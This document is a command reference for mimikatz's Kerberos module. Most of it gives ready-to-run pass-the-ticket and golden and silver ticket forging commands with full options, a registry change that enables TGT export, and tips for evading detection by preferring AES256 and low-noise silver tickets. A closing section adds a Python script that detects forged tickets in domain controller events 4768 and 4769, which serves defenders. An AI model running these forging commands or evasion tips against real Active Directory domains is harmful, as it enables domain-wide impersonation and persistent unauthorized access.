kerberos
Interact with Kerberos tickets using the official Microsoft Kerberos API. No elevated privileges required for most commands. Used for Pass-the-Ticket and forging golden/silver tickets.
ptt - Pass-the-Ticket
Inject one or more Kerberos tickets into the current session.
mimikatz # kerberos::ptt <ticket.kirbi>
mimikatz # kerberos::ptt <directory\>
Options
- <ticket.kirbi> - single ticket file path (or multiple space-separated)
- <directory> - directory containing .kirbi files for batch injection
Examples
mimikatz # kerberos::ptt Administrator@krbtgt-<domain>.kirbi
Ticket 'Administrator@krbtgt-<domain>.kirbi' successfully submitted for current session
# Inject all tickets from a directory
mimikatz # kerberos::ptt C:\temp\tickets\
golden / silver - Forge Tickets
Create arbitrary Kerberos TGT (golden) or service ticket (silver) with custom user/group membership.
mimikatz # kerberos::golden /user:<username> /domain:<domain> /sid:<sid> /krbtgt:<nt-hash> [/id:<user-id>] [/groups:<group-ids>] [/ticket:<output>.kirbi] [/ptt] [/startoffset:<min>] [/endin:<min>] [/renewmax:<min>] [/aes128:<aes128-key>] [/aes256:<aes256-key>]
Options - All (golden and silver)
- /user:<username> - username to embed in ticket
- /domain:<domain> - fully qualified domain name (e.g. corp.local)
- /sid:<sid> - domain SID (e.g. S-1-5-21-...)
- /krbtgt:<nt-hash> - krbtgt NTLM hash (alias: /rc4)
- /rc4:<rc4> - RC4/NTLM hash
- /aes128:<aes128-key> - AES128 encryption key
- /aes256:<aes256-key> - AES256 encryption key (preferred)
- /id:<user-id> - user RID (default: 500 / Administrator)
- /groups:<group-ids> - comma-separated group RIDs (default: 513,512,520,518,519)
- /ticket:<output>.kirbi - output file (default: ticket.kirbi)
- /ptt - inject directly into current session
- /startoffset:<min> - ticket start offset in minutes (negative = past)
- /endin:<min> - ticket duration in minutes
- /renewmax:<min> - max renewal duration in minutes
Options - Silver Ticket Only
- /target:<hostname> - target server hostname
- /service:<svc> - service name: cifs, http, mssql, rpcss, host, ldap, etc.
Examples
# Golden ticket (RC4)
mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /krbtgt:<nt-hash> /ptt
# Golden ticket (AES256, stealthier)
mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /aes256:<aes256-key> /ptt
# Golden ticket with custom group membership + extra SID (cross-domain)
mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /krbtgt:<nt-hash> /groups:512,513,519 /sids:<parent-domain-sid>-519 /ptt
# Silver ticket (cifs)
mimikatz # kerberos::golden /user:<username> /domain:<domain> /sid:<sid> /target:<computer>.<domain> /service:cifs /rc4:<rc4> /ptt
# Silver ticket (ldap, for DCSync)
mimikatz # kerberos::golden /user:<username> /domain:<domain> /sid:<sid> /target:<dc>.<domain> /service:ldap /rc4:<rc4> /ptt
# Save to file
mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /krbtgt:<nt-hash> /ticket:<output>.kirbi
tgt - Display Current TGT
Show TGT information for the current session.
mimikatz # kerberos::tgt
Note: Null session keys indicate that the AllowTGTSessionKey registry value is 0. Set it to 1 to enable TGT export:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters /v AllowTGTSessionKey /t REG_DWORD /d 1
list - List Tickets
Enumerate and optionally export current session's Kerberos tickets.
mimikatz # kerberos::list [/export]
- /export - save all tickets as .kirbi files in current directory
purge - Remove All Tickets
Remove all Kerberos tickets from the current session.
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
Notes
- Golden tickets bypass password changes; krbtgt hash must be rotated twice to invalidate
- Golden tickets are not issued by the real KDC, so no authentication event is logged at ticket creation
- Use AES256 keys over RC4 to avoid encryption downgrade detection events
- Silver tickets only require the service account's hash (not krbtgt); more targeted, lower noise
- After injection with /ptt or kerberos::ptt, use klist (built-in) to verify
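
For defenders, the notes on KDC logging and RC4 translate into checks over domain controller Security events 4768 (TGT issued) and 4769 (service ticket requested). The script below is an added example, not part of mimikatz or the original page; the tuple layout, the sample records and the 10-hour window are constructed assumptions.

```python
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # "Ticket Encryption Type" value logged for RC4 tickets
# Assumption: 10 h maximum TGT lifetime (the default domain policy value).
TGT_WINDOW = timedelta(hours=10)

# Constructed sample records, simplified from DC Security events:
# (time, event_id, account, client_ip, ticket_etype)
SAMPLE_EVENTS = [
    ("2024-05-01T08:00:00", 4768, "alice", "10.0.0.5", 0x12),
    ("2024-05-01T08:01:00", 4769, "alice", "10.0.0.5", 0x12),
    ("2024-05-01T09:00:00", 4769, "Administrator", "10.0.0.77", 0x12),
    ("2024-05-01T09:30:00", 4769, "bob", "10.0.0.9", 0x17),
    ("2024-05-01T09:29:00", 4768, "bob", "10.0.0.9", 0x12),
]


def find_suspicious(events, window=TGT_WINDOW):
    """Return (account, reason) findings in event-time order."""
    last_tgt = {}  # (account, client_ip) -> time of the most recent 4768
    findings = []
    for ts, event_id, account, ip, etype in sorted(events):
        when = datetime.fromisoformat(ts)
        key = (account.lower(), ip)
        if event_id == 4768:
            last_tgt[key] = when
            continue
        if event_id != 4769:
            continue
        issued = last_tgt.get(key)
        # A TGT the KDC never issued leaves a 4769 with no matching 4768.
        if issued is None or when - issued > window:
            findings.append(
                (account, "service ticket request with no prior TGT issuance"))
        # RC4 tickets in an AES-capable domain are worth a second look.
        if etype == RC4_HMAC:
            findings.append(
                (account, "RC4 service ticket (possible encryption downgrade)"))
    return findings


if __name__ == "__main__":
    for account, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"{account}: {reason}")
```

Ticket renewals and events spread across several domain controllers produce false positives unless the logs are merged first. Silver tickets never reach the KDC, so this check does not cover them.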